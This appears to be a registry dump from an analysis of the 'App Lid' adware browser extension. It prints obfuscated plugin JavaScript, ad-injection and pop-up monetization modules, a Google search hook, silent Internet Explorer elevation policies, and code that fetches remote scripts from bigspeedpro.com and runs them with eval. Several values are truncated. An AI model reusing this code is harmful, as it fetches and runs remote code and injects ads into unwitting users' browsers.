"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\200]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/200.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,345,354,253,102,104,180,184,220,195,200,221,223,234,242,252,255,262,263,281,288,301,91"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\46]
"Version" = "5"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\246]
"JavaScript" = "var _0x6ef5=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\281]
"Name" = "ibario_tier3_pops_m"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\44]
"Name" = "IEMisc"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"AppPath" = "%Program Files% (x86)\App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\104]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/104.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
"Policy" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\1]
"Version" = "11"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\28]
"Version" = "4"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\41]
"Version" = "7"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"Description" = "Apps Hat is the cool new Android app store that helps you discover hot new apps, both free and discounted. Get personalised recommendations, price drop alerts, and share your favourite apps with your friends."
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\36]
"Name" = "IEBackground"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI3ZDc5NTUxMjA1MGQxYzI0MDgxNTU1NGE1NzU4MTkwZDE4MDE0MDU2NTgxMzEzMTQ1ZjBmMDUwMjFiMWQxMzVlMTQxNTFjNTYxZjEyMDgxMDA3MDQ1ODRiNDU0YzVhNDY0ZDRiNDI0NzQxNGY1ZTA5MWUxNDE2MTYxNjE0NTkxMDAyNDYxZjA0MTgxMDEzNGQyODI1MzIyYjIzMjIyOTJiM2UzNDMyMjgyZTNjMzQyNTNmMzczMzM1MzMyNTIyMmMyZTJlMzMzZDI4MmY1MTBmMWM0NDMzMmUzOTJiMzgyMzI0MjgzODNkMjkyMzI1MzgyNzIwMjgzNDMwMzQyOTJlMjU1YjViN2E3ZTU4MTkwZDE4MDEwOTJjMDUxYzU1NDA1MTViMDQwNTBlMDkwNDRhNTg1NTEyMWQwMjVmMGMxMDA0MTExMzFlNWYxYTAzMWM1NTBhMTQwMjFlMGEwNTU2NWQ0NTRmNGY0MDQ3NDU0ZjQ2NGY1OTVlMGEwYjEyMWMxODFiMTU1NzA2MDI0NTBhMDIxMjFlMWU0YzI2MzMzMjI4MzYyNDIzMjUzMzM1M2MzZTJlM2YyMTIzMzUzOTNlMzQzZDMzMjIyZjNiMjgzOTMzMjUyZTVmMTkxYzQ3MjYyODMzMjUzNTIyMmEzZTM4M2UzYzI1MmYzNjJhMjEyNjIyMzAzNzNjMjgyZjU1NTY3YjcwNGUwMTE2MGMxMDE5MTkzMzE1NWI1NjUxNDg0YjQ0N2EwYQ==', 'ywpwzqylqz'); }"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\207]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/207.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\72]
"Version" = "5"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\207]
"Name" = "dbWrapper"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"BgVersion" = "1"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\47]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/47.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,Å–"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"AppName" = "App Lid-bg.exe"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\354]
"Version" = "2"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\182]
"Version" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\200]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTc2NjY1NGQxODEyMTcwNjMzMDAwMDRlNTY0ZjUyMGUxNzAyMTY0ODQzNDMxZTFhMWMwMzEwNTgwMDFkMTQxNTA4MGExMTBhNGQxNTA5MWY0MzFhNWQ0MTQwNDkxNDFlMGYwNjA5MDAwNTFjMDQ0OTUyNDY1MTQyNDMzMzMzMmMyMjI5MzAyNTM0M2IyODI5M2UzMDM1M2UzNzMzMjgzNjI5MjgzMzNjMjUyNDNjM2YyMjJkMzM1MzFjMGUwMjEyMGQxMzE0M2MwZDAxMDk1MjJmMzkyMDI0MjkyMTNmM2UyNTJiMzUzNDNjMzczNjIyMzMyMjJkMjIzNTM5M2M1NDRhNzg2NTRlMDQxYjA0MTYxMDIzMTQxZTRlNTY0YzRkMTgxMjE3MDYxNTQ4NDM0MzFlMWExYzAzMTA1ODAwMWQxNDE1MDgwYTExMGE0ZDE1MDkxZjQzMWE1ZDQxNDA0OTE0MWUwZjA2MDkwMDA1MWMwNDQ5NTI0NjUxNDI0MzMzMzMyYzIyMjkzMDI1MzQzYjI4MjkzZTMwMzUzZTM3MzMyODM2MjkyODMzM2MyNTI0M2MzZjIyMmQzMzUzMWMwZTAyMTIwZDEzMTQzYzBkMDEwOTUyMmYzOTIwMjQyOTIxM2YzZTI1MmIzNTM0M2MzNzM2MjIzMzIyMmQyMjM1MzkzYzU0NGE3ODY1NGUxYzAzMDUwMTBhMTgyZjE2NGU1NjRjNWQ0MDU2NjkwYg==', 'lllopfcvfr'); }"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\64]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/64.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\184]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/184.js"
[HKCU\Software\AppDataLow\Software\App Lid\Code]
"NewTabJavaScript" = ""
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"AppName" = "App Lid-codedownloader.exe"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\104]
"Version" = "14"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"CodeDownloadDomain" = "http://js.ourclientinputsrv.com"
[HKCU\Software\AppDataLow\Software\App Lid\Code]
"BgJavaScript" = "appAPI.ready(function($) { window.affid = appAPI.installer.getParams().uzid !== '0' ? appAPI.installer.getParams().uzid : appshatmadness; var buttonState = true; appAPI.browserAction.setResourceIcon('19x19.png'); appAPI.browserAction.setTitle('Browse Apps Hat'); appAPI.browserAction.onClick(function() { if (buttonState) { appAPI.tabs.create('http://www.appshat.com/home'); } buttonState = !buttonState; }); appAPI.request.get({ url: http://www.bigspeedpro.com/nero/js/crossrider/nero_background_options.js, onSuccess: function(response) { eval(response); } });});"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"Policy" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\242]
"Version" = "4"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\40]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/40.js"
[HKCU\Software\AppDataLow\Software\App Lid\Code]
"AppJavaScript" = "appAPI.ready(function ($) { appAPI.request.get({ url: document.location.protocol //www.bigspeedpro.com/nero/js/crossrider/nero_crossrider_cs.js, onSuccess: function(response) { eval(response); }, onFailure: function(httpCode) { console.log('Failed to retrieve content' , httpCode); } });});"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\207]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"AppName" = "App Lid-buttonutil.exe"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\78]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/78.js"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"Policy" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===nÅ–"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"zdata" = "appshatmadness"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"Policy" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\21]
"Name" = "debug"
"Version" = "5"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\288]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTg2ZTU3NDU1MTRiNGQwZTBlMDMxMzMxMDUwOTUzNTE0ZjQ0MTIwMzE3MTQ0ZDRhNWUwMjFjMTIxYjAzMGEwNzU5MDExMDFmMGUwMDFiMDQxNzAzMDIxNzA0NDUwNjA4MWMxODRjMDIxODRhMWMwMjAxNDkxOTA1MTIwNzU5MGYwMjU0MDcwZjFlNGEzYzNiMzQzNzNlMzgzYzM0MzMzMzI2MzYyODMwMjIyZTNkMzkzMzMzM2MzYjUxMDcxZjBhMDIwMzQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzNjM1MjEzNDIxMjczNzMyM2MzYjUxMTYwNDA5MDYwMjQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzMjNkMjUyZTIxMjIzZjMzM2MzNzIyMjcyZTIyMmIzOTI1NTU0ZjZlNTc0NTUxNGI0ZDE2MTYwMjA0MGQxOTJjMTU0OTU1NDY0ODRmNWI2ZTBh', 'cdweqkofzw'); }"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\7]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/7.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\354]
"JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""
[HKCU\Software\AppDataLow\Software\App Lid\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\44]
"Version" = "6"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"StatsDomain" = "http://stats.ourclientinputsrv.com"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\21]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/21.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\102]
"Name" = "dealply_m"
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI2NzUxNTI0MjUyNGUwYzA0MWUwOTM4MDMxZTQwNDg0YzQ2MTgxZTBkMWQ0YjVkNGQxYjQyMDcwMjA4MWYwNzAyNWMwYjFjMGEwYjVmMDkwYjBmMTc1ZDA4MTMxYTA1MDMwOTBiMDQwMTA2NGMxODFmNWIxMzAyMTgwMzFmMTcwZTRmMGYxNjE0MTgyNjMyMmUzMTMwM2QzZjM3MjIyMzNkMjgyMzJkMjcyYTM4MjEzZTJlM2MyOTJlMjEzNzMwMzMyZDM0MzUyNjRiMTAwMjEyMjYwNTEwMWMwZjQ0MzIyZTMxMzAzZDNmMzcyMjIzM2QyODIzMmQyMzIyM2MzYjNlMmIzNDI4MmUyZDQ0MWEwNTAwNGQzNTI2MmUyMzNkMzEyMTNlMmQzNDJmMmIzMjI0MjEyNzIwMzMyZDM0MzUyNjRmNWQ3ODQyNTI0YzQ0NTIwMjBkMTkwMTAxMzcwMDAwNDY0YTRhNWIwNTA1MDYxMjAxNTY0YjVmMDMyNjBlMDMxMDA0MTgxZjNiMTkwNDFmMDI1ZjA2MGUwMTBmMDAxZTQ0MWEwMjFjNWQwMTAwMGUwMjVmMDAxODFiMTAwMTAxMDAwNTE0MDQ0NDEzMWU0ZTExMGExMzAyMGExNTA2NDQwZTAzMTYxMDJkMzMzYjMzMzgzNjNlMjIyMDJiMzYyOTM2MmYyZjIxMzkzNDNjMjYzNzI4M2IyMzNmM2IzMjM4MzYzZDJkNGEwNTAwMWEyZDA0MDUxZTA3NGYzMzNiMzMzODM2M2UyMjIwMmIzNjI5MzYyZjJiMjkzZDJlM2MyMzNmMjkzYjJmNGMxMTA0MTU0ZjNkMmQyZjM2M2YzOTJhM2YzODM2MjcyMDMzMzEyMzJmMmIzMjM4MzYzZDJkNGU0ODdhNGE1OTRkNTE1MDEyMWUxOTAzMTkwNDMwMDk1MzQ4NDI0MzVjNTY3YTE3', 'ymqrbrldpj'); }"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\14]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/14.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\41]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/41.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }SÅ–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\288]
"Name" = "firstoffer_pricecomp_m"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"Policy" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\91]
"JavaScript" = "(function(M){var A=[].slice;var z={};var a=function(at){if(typeof at==string&&typeof at.trim==function){return at.trim();}return at==null?:at.toString().replace(/^\s /,).replace(/\s $/,);};function f(at){var au=z[at]={},av,aw;at=at.split(/\s /);for(av=0,aw=at.length;av
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\281]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/281.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\36]
"Version" = "8"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\354]
"Name" = "categories"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\22]
"Name" = "resources"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"Publisher" = "Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\177]
"Name" = "crossriderDashboard"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\104]
"Name" = "jollywallet_m"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\7]
"Name" = "hooks"
"Version" = "2"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"UninstallString" = "%Program Files% (x86)\App Lid\Uninstall.exe /fcp=1"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\281]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MGIxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMTJlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3MzMyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }"
[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\25286]
"65743" = "App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\102]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/102.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\184]
"Name" = "noproblemppc_m"
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI2YjcwNTgwZTE4MDQxNzJjMWQxNTQzNDM1YTQ0MDQwNDEzMDk1NTU2NGUxNzBhMTU0MjAwMDYwYTFiMTgwZDFjMWIwMjFmNWUwNDE2MDI1NjBmMDkwOTA0NDMxYzA4MWUwNjFhNGYxMzA5NTkyMzAyMGUxZTA2MTcyODFkNDcyMzU0MzE1MzM4NWQ0YTIwNTQzODU2NWY0NDRhM2M1ZDQ4NTA1NDNiNWYyZDQwNGE0OTVmNDg1NDQ4NGQyMjVkNDAyMTRmMmE1ZjMyMTAwZTAzMjUxNDVhMmEwZTE1MDQwYTVjMzYwZDAyMTMxNzBhMGIyODNkNDc1NDVjNDA1NzQ5NDkyOTEzMTYxZTEzMGYwNDI5MTgwMjFjNWMyNjI1MjUzZTNmMzQyYTNkMzAyNTNjMjgzOTJkMjAzNzI2MjEzODJjM2MyNTM5NGEyNDA4MTYwMzFiMDAwYjMzMDI1MTJmMzgzYTNkMzYzMjJhMjgyZjI4MzUzNTI2MmEyMTM1M2MzNDIyMjkzNDM4MmEzYTNiM2UzMDNlMzkzMzUyNGI3MzY2NWIwOTBkMGUxNjFmMjUxNTE1NGQ0MzQxNWIxMjEyMTgwMDE0NDM0MDU2MGYwOTA5NDgxYzExMTQwZDBlMTUwNDE4MWUxNTQyMTMwODE0NDAxNzExMGExODQ5MDAxZjAwMTAwYzU3MGIwYTQ1MjkxZTE5MDAxMDAxMzAwNTQ0M2Y1ZTJkNDQyNjRiNWMzODRjM2I0YTU1NTg1ZDIyNGI1ZTQ4NGMzODQzMjc1YzVkNTc0OTVlNGM1MDRlM2U1NzVjMzY1MTNjNDkyYTA4MGQxZjJmMDg0ZDM0MTgwMzFjMTI1ZjJhMDcxZTA0MDkxYzFkMzAyNTQ0NDg1NjVjNDA1NzVmM2YwYjBlMWQwZjA1MTgzZTA2MTQwYTQ0M2UyNjM5MzQyMzIzMzQyYjI2M2QyNDJiMjUyNzNjMjA2Å–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"DisplayIcon" = "%Program Files% (x86)\App Lid\utils.exe"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\45]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/45.js"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"AppName" = "App Lid-buttonutil.exe"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\45]
"Name" = "IEOnRequest"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\38]
"Version" = "4"
[HKCU\Software\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
"Policy" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\39]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/39.js"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"Manifest" = "NA"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
"AppName" = "App Lid-buttonutil64.exe"
"Policy" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"osName" = "7"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.seÅ–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\345]
"JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358],intext:[103,117,123,142,259,263,342,359,360],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371]};"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\45]
"Version" = "4"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\44]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/44.js"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"AppName" = "App Lid-codedownloader.exe"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\255]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/255.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\94]
"Version" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\182]
"Name" = "openUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"CrAppId" = "65743"
